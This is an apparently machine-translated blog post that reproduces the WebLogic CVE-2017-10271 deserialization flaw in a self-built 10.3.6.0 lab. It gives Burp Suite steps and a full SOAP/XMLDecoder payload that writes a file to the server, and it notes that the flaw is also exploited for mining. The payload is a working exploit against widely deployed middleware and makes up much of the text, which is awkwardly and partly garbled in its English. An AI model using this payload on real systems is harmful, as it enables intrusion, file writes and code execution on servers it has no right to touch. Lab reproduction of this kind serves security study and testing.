Small R recently set up a WebLogic, because before the company to find a system vulnerability, found this loophole, so specifically to build a special 10.3.6.0 version.
Vulnerability Number: cve-2017-10271
Description of the vulnerability: cve-2017-10271 remote code execution vulnerability exists in WebLogic's WLS component, which can be constructed to host a request to run WebLogic middleware. In addition, this vulnerability can also be exploited for mining.
1. The environment on its own to the official website to build it. To 10.3.6.0 this version,
2. The current discovery is that there is a vulnerability in this page.
3. Capture the package via Burpsuite, then modify the data
The grabbed package is a GET request, note: You need to change to post, and then add the following code
<soapenv:envelope xmlns:soapenv= "http://schemas.xmlsoap.org/soap/envelope/" >
<soapenv:Header>
<work:workcontext xmlns:work= "http://bea.com/2004/06/soap/workarea/" >
<java version= "1.6.0" class= "Java.beans.XMLDecoder" >
<object class= "Java.io.PrintWriter" >
<string>servers/adminserver/tmp/_wl_internal/wls-wsat/54p17w/war/r.hacker</string><void method= " Println ">
<string>xmldecoder_vul_test</string></void><void method= "Close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
Send me a change:
Experiment successfully, write code successfully!
This is just a simple case. Follow-up will continue to update Kazakhstan
About WebLogic 10.3.6.0 's vulnerability Replay (1)